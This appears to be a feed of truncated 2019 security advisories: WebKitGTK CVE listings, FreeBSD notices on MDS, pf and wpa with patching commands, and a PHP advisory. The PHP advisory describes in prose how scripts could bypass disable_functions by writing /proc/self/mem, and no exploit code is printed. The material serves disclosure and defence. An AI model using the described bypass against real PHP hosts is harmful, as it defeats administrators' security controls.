6.1.2, upgrade to version 5.13.5. If you are running Bitbucket Server 5.14.x and cannot upgrade to 6.1.2, upgrade to version 5.14.3. If you are running Bitbucket Server 5.15.x and cannot upgrade to 6.1.2, upgrade to version 5.5.2. If you are running Bitbucket Server 6.0.x and cannot upgrade to 6.1.2, upgrade to version 6.0.3. For a full description of the latest version of Bitbucket Server, see the release notes found at https://confluence.atlassian.com/display/BitbucketServer/Bitbucket+Server+release+notes. You can download the latest version of Bitbucket Server from the download centre found at https://www.atlassian.com/software/bitbucket/download. Support: If you have questions or concerns regarding this advisory, please raise a support request at https://support.atlassian.com/. -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEXh3qw5vbMx/VSutRJCCXorxSdqAFAlzl3DEACgkQJCCXorxS dqCoZQ/+NGRDr27asjsEg1d9ft2qC/hl+0B2jFaOg3rJoZYBUyPJUNL59pgayu2x 99/NleRCU12VNK4xenhQGHPwbDXfvAh7eSuWksc0q+gN9VudqVZhnKNKZKajn9H3 pfESjk8e2sEVUEtHOKX4RjYd95VrTwFQdVagyu8fUSkHfQa1DU3sEmYqO67ySH6d R6pxSaEQVhpQgFkZrTY
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0003
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0003 Date reported : May 20, 2019 Advisory ID : WSA-2019-0003 WebKitGTK Advisory URL : https://webkitgtk.org/security/WSA-2019-0003.html WPE WebKit Advisory URL : https://wpewebkit.org/security/WSA-2019-0003.html CVE identifiers : CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8615, CVE-2019-8611, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623. Several vulnerabilities were discovered in WebKitGTK and WPE WebKit. CVE-2019-6237 Versions affected: WebKitGTK and WPE WebKit before 2.24.1. Credit to G. Geshev working with Trend Micro Zero Day Initiative, Liu Long of Qihoo 360 Vulcan Team. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8571 Versions affected: WebKitGTK and WPE WebKit before 2.24.0. Credit to 01 working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8583 Versions affected: WebKitGTK and WPE WebKit before 2.24.0. Credit to sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of Tencent Keen Lab, and dwfault working at ADLab of Venustech. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8584 Versions affected: WebKitGTK and WPE WebKit before 2.24.1. Credit to G. Geshev of MWR Labs working with Trend Micro Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8586 Versions affected: WebKitGTK and WPE WebKit before 2.24.0. Credit to an anonymous researcher. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8587 Versions affected: WebKitGTK and WPE WebKit before 2.24.1. Credit to G. Geshev working with Trend Micro Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8594 Versions affected: WebKitGTK and WPE WebKit before 2.24.0. Credit to Suyoung Lee and Sooel Son of KAIST Web Security & Privacy Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8595 Versions affected: WebKitGTK and WPE WebKit before 2.24.2. Credit to G. Geshev from MWR Labs working with Trend Micro Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8596 Versions affected: WebKitGTK and WPE WebKit before 2.24.1. Credit to Wen Xu of SSLab at Georgia Tech. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8597 Versions affected: WebKitGTK and WPE WebKit before 2.24.1. Credit to 01 working with Trend Micro Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8601 Versions affected: WebKitGTK and WPE WebKit before 2.24.1. Credit to Fluoroacetate working with Trend Micro's Zero Day Initiative. Processing maliciously crafted web content may lead to arbitrary code execution. Multiple memory corruption issues were addressed with improved memory handling. CVE-2019-8607 Versions affected: WebKitGTK and WPE WebKit before 2.24.2. Credit to Junho Jang and Hanul Choi of LINE Security Team. Processing maliciously crafted web content may result in the disclosure of process memory. An out-of-bounds read was addressed with improved input validation. CVE-2019-8608 Versions affected: WebKitGTK and WPE WebKit before 2.24.1. Credit to G. Geshev working with Trend Micro Zero Day Initiative.
Advisory: security controls configured in php.ini could be bypassed on Linux
"PHP is a popular general-purpose scripting language that is especially suited to web development." PHP has deployed several features over the years that are prone to incorrect architectural decisions (safe mode https://www.php.net/manual/en/features.safe-mode.php or open_basedir http://news.php.net/php.internals/105606), to have unexpected security implications (register globals https://www.php.net/manual/en/security.globals.php), or simply violated architectural patterns and ended up in a mess (magic quotes gpc - https://www.php.net/manual/en/security.magicquotes.php). This advisory is about to expand this list: security controls configured via php.ini directives at the PHP_INI_SYSTEM level are ineffective as they could be bypassed by malicious scripts via writing their own process memory on the Linux platform. As an example, a threat actor could exploit this flaw to execute PHP functions that have been disabled via the disable_functions directive. It is quite common to disable the exec family of PHP functions aiming to prevent OS command execution in PHP scripts. This weakness enables executing OS commands in restricted configurations. The attack has been reported to the PHP maintainers (https://bugs.php.net/bug.php?id=78006) along with a proof of concept code (https://github.com/irsl/php-bypass-disable-functions) and the recommendation to introduce a new security measure via the fopen wrappers to prevent tampering with /proc/self/mem. The issue was acknowledged but the proposal was rejected saying the attack could be mounted via PHP extensions as well, and this shall be addressed at the operating system level instead. At this point, I decided to publish this advisory, so that system administrators who rely on php.ini settings as their primary/only line of defense shall revisit their configuration and follow another approaches to secure their applications.
FreeBSD Security Advisory FreeBSD-SA-19:07.mds [REVISED]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:07.mdsSecurity Advisory The FreeBSD Project Topic: Microarchitectural Data Sampling (MDS) Category: core Module: kernel Announced: 2019-05-14 Credits:Refer to Intel's security advisory at the URL below for detailed acknowledgements. Affects:All supported versions of FreeBSD. Corrected: 2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE) 2019-05-14 23:19:08 UTC (releng/12.0, 12.0-RELEASE-p4) 2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE) 2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2018-12126, CVE-2018-12127, CVE-2018-12130, CVE-2019-11091 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. 0. Revision history v1.0 2019-05-14 Initial release. v1.1 2019-05-15 Fixed date on microcode update package. v1.2 2019-05-15 Userland startup microcode update details added. Add language specifying which manufacturers is affected. I. Background Modern processors make use of speculative execution, an optimization technique which performs some action in advance of knowing whether the result will actually be used. II. Problem Description On some Intel processors utilizing speculative execution a local process may be able to infer stale information from microarchitectural buffers to obtain a memory disclosure. III. Impact An attacker may be able to read secret data from the kernel or from a process when executing untrusted code (for example, in a web browser). IV. Workaround No workaround is available. Only Intel x86 based processors are affected. x86 processors from other manufacturers (eg, AMD) are not believed to be vulnerable. Systems with users or processors in different trust domains should disable Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0: # echo 'machdep.hyperthreading_allowed=0 >> /boot/loader.conf' # shutdown -r +10min "Security update" V. Solution Perform one of the following: Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, evaluate mitigation and Hyper Threading controls, and reboot the system. New CPU microcode may be available in a BIOS update from your system vendor, or by installing the devcpu-data package or sysutils/devcpu-data port. Ensure that the BIOS update or devcpu-data package is dated after 2019-05-14. If using the package or port the Intel microcode update can be applied at boot time (only on FreeBSD 12 and later) by adding the following lines to the system's /boot/loader.conf: cpu_microcode_load="YES" cpu_microcode_name="/boot/firmware/intel-ucode.bin" To automatically load microcode during userland startup (supported on all FreeBSD versions), add the following to /etc/rc.conf: microcode_update_enable="YES" 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Follow additional details under "Mitigation Configuration" below. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.0-STABLE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc # gpg --verify mds.12-stable.patch.asc [FreeBSD 12.0-RELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc # gpg --verify mds.12.0.patch.asc [FreeBSD 11.3-PRERELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch.asc # gpg --verify mds.11-stable.patch.asc [FreeBSD 11.2-RELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch.asc # gpg --verify mds.11.2.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html&
FreeBSD Security Advisory FreeBSD-SA-19:07.mds
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:07.mdsSecurity Advisory The FreeBSD Project Topic: Microarchitectural Data Sampling (MDS) Category: core Module: kernel Announced: 2019-05-14 Credits:Refer to Intel's security advisory at the URL below for detailed acknowledgements. Affects:All supported versions of FreeBSD. Corrected: 2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE) 2019-05-15 13:44:27 UTC (releng/12.0, 12.0-RELEASE-p5) 2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE) 2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2018-12126, CVE-2018-12127, CVE-2018-12130, CVE-2019-11091 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. 0. Revision history v1.0 2019-05-14 Initial release. v1.1 2019-05-15 Fixed date on microcode update package. v1.2 2019-05-15 Userland startup microcode update details added. Add language specifying which manufacturers is affected. v1.3 2019-05-15 Minor quoting nit for the HT disable loader config. v2.0 2019-05-15 Rerelease 12.0-RELEASE patch as -p5 due to i386 panic bug. I. Background Modern processors make use of speculative execution, an optimization technique which performs some action in advance of knowing whether the result will actually be used. II. Problem Description On some Intel processors utilizing speculative execution a local process may be able to infer stale information from microarchitectural buffers to obtain a memory disclosure. III. Impact An attacker may be able to read secret data from the kernel or from a process when executing untrusted code (for example, in a web browser). IV. Workaround No workaround is available. Only Intel x86 based processors are affected. x86 processors from other manufacturers (eg, AMD) are not believed to be vulnerable. Systems with users or processors in different trust domains should disable Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0: # echo 'machdep.hyperthreading_allowed=0' >> /boot/loader.conf # shutdown -r +10min "Security update" V. Solution Perform one of the following: Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, evaluate mitigation and Hyper Threading controls, and reboot the system. New CPU microcode may be available in a BIOS update from your system vendor, or by installing the devcpu-data package or sysutils/devcpu-data port. Ensure that the BIOS update or devcpu-data package is dated after 2019-05-14. If using the package or port the Intel microcode update can be applied at boot time (only on FreeBSD 12 and later) by adding the following lines to the system's /boot/loader.conf: cpu_microcode_load="YES" cpu_microcode_name="/boot/firmware/intel-ucode.bin" To automatically load microcode during userland startup (supported on all FreeBSD versions), add the following to /etc/rc.conf: microcode_update_enable="YES" 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Follow additional details under "Mitigation Configuration" below. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [*** v2.0 NOTE *** Only applies to 12.0-RELEASE ***] Due to an error in the 12.0-RELEASE affecting the i386 architecture, a new set of patches is being released. If your 12.0-RELEASE sources are not yet patched using the initially published patch, then you need to apply the mds.12.0.patch. If your sources are already updated, or patched with the patch from the initial advisory, then you need to apply the incremental patch, named mds.12.0.p4p5.patch [FreeBSD 12.0-STABLE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc # gpg --verify mds.12-stable.patch.asc [FreeBSD 12.0-RELEASE, not patched with initial SA-19:07.mds patch] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc #
FreeBSD Security Advisory FreeBSD-SA-19:07.mds
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:07.mdsSecurity Advisory The FreeBSD Project Topic: Microarchitectural Data Sampling (MDS) Category: core Module: kernel Announced: 2019-05-14 Credits:Refer to Intel's security advisory at the URL below for detailed acknowledgements. Affects:All supported versions of FreeBSD. Corrected: 2019-05-14 17:04:00 UTC (stable/12, 12.0-STABLE) 2019-05-14 23:19:08 UTC (releng/12.0, 12.0-RELEASE-p4) 2019-05-14 17:05:02 UTC (stable/11, 11.3-PRERELEASE) 2019-05-14 23:20:16 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2018-12126, CVE-2018-12127, CVE-2018-12130, CVE-2019-11091 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background Modern processors make use of speculative execution, an optimization technique which performs some action in advance of knowing whether the result will actually be used. II. Problem Description On some Intel processors utilizing speculative execution a local process may be able to infer stale information from microarchitectural buffers to obtain a memory disclosure. III. Impact An attacker may be able to read secret data from the kernel or from a process when executing untrusted code (for example, in a web browser). IV. Workaround No workaround is available. Systems with users or processors in different trust domains should disable Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0: # echo 'machdep.hyperthreading_allowed=0 >> /boot/loader.conf' # shutdown V. Solution Perform one of the following: Update CPU microcode, upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date, evaluate mitigation and Hyper Threading controls, and reboot the system. New CPU microcode may be available in a BIOS update from your system vendor, or by installing the devcpu-data package or sysutils/devcpu-data port. Ensure that the BIOS update or devcpu-data package is dated after 2014-05-14. If using the package or port the microcode update can be applied at boot time by adding the following lines to the system's /boot/loader.conf: cpu_microcode_load="YES" cpu_microcode_name="/boot/firmware/intel-ucode.bin" Microcode updates can also be applied while the system is running. See cpucontrol(8) for details. 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Follow additional details under "Mitigation Configuration" below. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.0-STABLE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12-stable.patch.asc # gpg --verify mds.12-stable.patch.asc [FreeBSD 12.0-RELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.12.0.patch.asc # gpg --verify mds.12.0.patch.asc [FreeBSD 11.3-PRERELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11-stable.patch.asc # gpg --verify mds.11-stable.patch.asc [FreeBSD 11.2-RELEASE] # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch # fetch https://security.FreeBSD.org/patches/SA-19:07/mds.11.2.patch.asc # gpg --verify mds.11.2.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html>. Mitigation Configuration Systems with users, processes, or virtual machines in different trust domains should disable Hyper-Threading by setting the machdep.hyperthreading_allowed tunable to 0: # echo machdep.hyperthreading_allowed=0 >> /boot/loader.conf To activate the MDS mitigation set the hw.mds_disable sysctl. The settings are: 0 - mitigation disabled 1 - VERW instruction (microcode) mitigation enabled 2 - Software sequence mitigation enabled (not recommended) 3 - Automatic VERW or Software selection Automatic
FreeBSD Security Advisory FreeBSD-SA-19:05.pf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:05.pf Security Advisory The FreeBSD Project Topic: IPv6 fragment reassembly panic in pf(4) Category: contrib Module: pf Announced: 2019-05-14 Credits:Synacktiv Affects:All supported versions of FreeBSD Corrected: 2019-03-01 18:12:05 UTC (stable/12, 12.0-STABLE) 2019-05-14 23:10:21 UTC (releng/12.0, 12.0-RELEASE-p4) 2019-03-01 18:12:07 UTC (stable/11, 11.3-PRERELEASE) 2019-05-14 23:10:21 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2019-5597 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background pf(4) is an Internet Protocol packet filter originally written for OpenBSD. In addition to filtering packets, it also has packet normalization capabilities. II. Problem Description A bug in the pf(4) IPv6 fragment reassembly logic incorrectly uses the last extension header offset from the last received packet instead of from the first packet. III. Impact Malicious IPv6 packets with different IPv6 extensions could cause a kernel panic or potentially a filtering rule bypass. IV. Workaround Only systems leveraging the pf(4) firewall and include packet scrubbing using the recommended 'scrub all in' or similar are affected. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterwards, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterwards, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:05/pf.patch # fetch https://security.FreeBSD.org/patches/SA-19:05/pf.patch.asc # gpg --verify pf.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r344706 releng/12.0/ r347591 stable/11/r344707 releng/11.2/ r347591 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://www.synacktiv.com/ressources/Synacktiv_OpenBSD_PacketFilter_CVE-2019-5597_ipv6_frag.pdf> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5597> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:05.pf.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlzbTsNfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cL1cxAAjYy90WBfuBkU/FddQWMJkXOn2YqABFxY/BfFpJEbGrnXXuxz9YJByK3b 6ikWq5HcxgL/9ek6QULwEOoNvms8tT4m4waJOLa3hZPoPlgD2ArgvdcEI00R/8T9 Z+k1YlT0oLOY4XbVynPGNmiFNTAcsg7Ognp9yam3kmPZTMGYm6cKIBy1idrzCCmI nj0SscyoL4Z09kSWe3UOitjh8cpxqGuvGosCb7YGPl6yTSalBUgP44Lyg7jS4nrZ xjZxqhAfp7tk9peF4rov8apZIsrBF5GMaahnIGIwZzmRn/E1pND9qx1lB1Uh7rfR nb8OmwbshJTWdnS1GXyLxRGJOd0zmh+YZ10ygZAQTM5sNaxfn6pWJFmr2S/mR+kN RG/Bhj+lN7jh1eUNdwk/pAm0aZZ+J8GX4/QOrqPfGDko/s/S7YwJB/DKR/14uPY7 Fwcgv4tvgoRstSKHdIe45d7/N0SgQCS/EfzVIO5XPQtkrk9/zalQubionijObr1Q ARVl7H5M7m7kP8PJz/vRNvhar0c0xTk9ov2JDxKHKTd+7D78LQEAFvEGPIFREBsY VBW8BqZbuVcsgrhr/YWFE3TEw4O0YbnY5g9wmVv+d/pdDngLuTsfbNEsAQewW
FreeBSD Security Advisory FreeBSD-SA-19:06.pf
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:06.pf Security Advisory The FreeBSD Project Topic: ICMP/ICMP6 packet filter bypass in pf Category: contrib Module: pf Announced: 2019-05-14 Credits:Synacktiv Affects:All supported versions of FreeBSD Corrected: 2019-03-21 14:17:10 UTC (stable/12, 12.0-STABLE) 2019-05-14 23:12:22 UTC (releng/12.0, 12.0-RELEASE-p4) 2019-03-21 14:17:12 UTC (stable/11, 11.3-PRERELEASE) 2019-05-14 23:12:22 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2019-5598 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background pf(4) is an Internet Protocol packet filter originally written for OpenBSD. In addition to filtering packets, it also has packet normalization capabilities. II. Problem Description States in pf(4) let ICMP and ICMP6 packets pass if they have a packet in their payload matching an existing condition. pf(4) does not check if the outer ICMP or ICMP6 packet has the same destination IP as the source IP of the inner protocol packet. III. Impact A maliciously crafted ICMP/ICMP6 packet could bypass the packet filter rules and be passed to a host that would otherwise be unavailable. IV. Workaround No workaround is available. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterwards, reboot the system. 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterwards, reboot the system. 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:06/pf.patch # fetch https://security.FreeBSD.org/patches/SA-19:06/pf.patch.asc # gpg --verify pf.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile your kernel as described in https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r345377 releng/12.0/ r347593 stable/11/r345378 releng/11.2/ r347593 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://www.synacktiv.com/posts/systems/icmp-reachable.html> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5598> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:06.pf.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAlzbTsdfFIAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n 5cIjXA/9FevC+Ygihzb0J9MN0znEM883dk5sPCSvMwiivsNRkDMXreYqPXU+Fkt0 iV1OZ8tKwKAihm+iGJ5mzS5l40wWF1oDcqJrC0myICdvreraoJKZvTLhgGIBqKkE b8yIuzPueWdnnudoAzTV38RhyaP2aOb44OMUNPQZsEB/6hHsNvp9m6yAua/F+x9+ N9J38Y/C6udsNfhqDeuCI4G8yiN33XfFiRbF+31rt3s0rUm6KGNsJanJe8dNAEvE DN4tA4+MORnQ7QTLgOobGuLFhWJ2urC6psH8duO72hcSTzSkTZpxrC3f6SW8RlZ+ Pbr4LZ6FA3bZp/sCmWPOot94hotBDr03MZwrxURokeDHZU1nUBsw0rmTG4aypujl JrGPOAp89TtqrR0zV8DhpGO/RWoBeMDf7ZGvIplOIEF5rijQWEyC5pnYlBKPfSdm UTxcN9RoJCfz7O4KLAAqhHiuu6xc+CqlQH1dvyLbqGVv9LzUQlziTNsbQ4cGryuj g1TztU0VfpvHDkAKBh0iHwkoUqDSut3K19rFAQ3zkM/EodqSTkE1OG77pmsjYaVq AfcnN/se8lklq0lKi3BwNvVIWTjhMAwY63otVxvVD4wrJrgQH8NKgOeYuGBreXeW Uv569bIhR0/vsyGJK/SMKxBiAGfzkE7LqDMJqdXLsompX97nOwI= =m3as -END PGP SIGNATURE-
FreeBSD Security Advisory FreeBSD-SA-19:03.wpa
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 = FreeBSD-SA-19:03.wpaSecurity Advisory The FreeBSD Project Topic: Multiple vulnerabilities in hostapd and wpa_supplicant Category: contrib Module: wpa Announced: 2019-05-14 Affects:All supported versions of FreeBSD. Corrected: 2019-05-01 01:42:38 UTC (stable/12, 12.0-STABLE) 2019-05-14 22:57:29 UTC (releng/12.0, 12.0-RELEASE-p4) 2019-05-01 01:43:17 UTC (stable/11, 11.2-STABLE) 2019-05-14 22:59:32 UTC (releng/11.2, 11.2-RELEASE-p10) CVE Name: CVE-2019-9494, CVE-2019-9495, CVE-2019-9496, CVE-2019-9497, CVE-2019-9498, CVE-2019-9499, CVE-2019-11555 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit https://security.FreeBSD.org/>. I. Background Wi-Fi Protected Access II (WPA2) is a security protocol developed by the Wi-Fi Alliance to secure wireless computer networks. hostapd(8) and wpa_supplicant(8) are implementations of user space daemon for access points and wireless client that implements the WPA2 protocol. II. Problem Description Multiple vulnerabilities exist in the hostapd(8) and wpa_supplicant(8) implementations. For more details, please see the reference URLs in the References section below. III. Impact Security of the wireless network may be compromised. For more details, please see the reference URLS in the References section below. IV. Workaround No workaround is available, but systems not using hostapd(8) or wpa_supplicant(8) are not affected. V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Afterwards, restart hostapd(8) or wpa_supplicant(8). 2) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Afterwards, restart hostapd(8) or wpa_supplicant(8). 3) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. [FreeBSD 12.0] # fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-12.patch # fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-12.patch.asc # gpg --verify wpa-12.patch.asc [FreeBSD 11.2] # fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-11.patch # fetch https://security.FreeBSD.org/patches/SA-19:03/wpa-11.patch.asc # gpg --verify wpa-11.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile the operating system using buildworld and installworld as described in https://www.FreeBSD.org/handbook/makeworld.html>. Restart the applicable daemons, or reboot the system. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r346980 releng/12.0/ r347587 stable/11/r346981 releng/11.2/ r347588 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://w1.fi/security/2019-1> https://w1.fi/security/2019-2> https://w1.fi/security/2019-3> https://w1.fi/security/2019-4> https://w1.fi/security/2019-5> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9494> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9495> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9496> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9497> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9498> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9499> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11555> The la
FreeBSD Security Advisory FreeBSD-SA-19:04.ntp
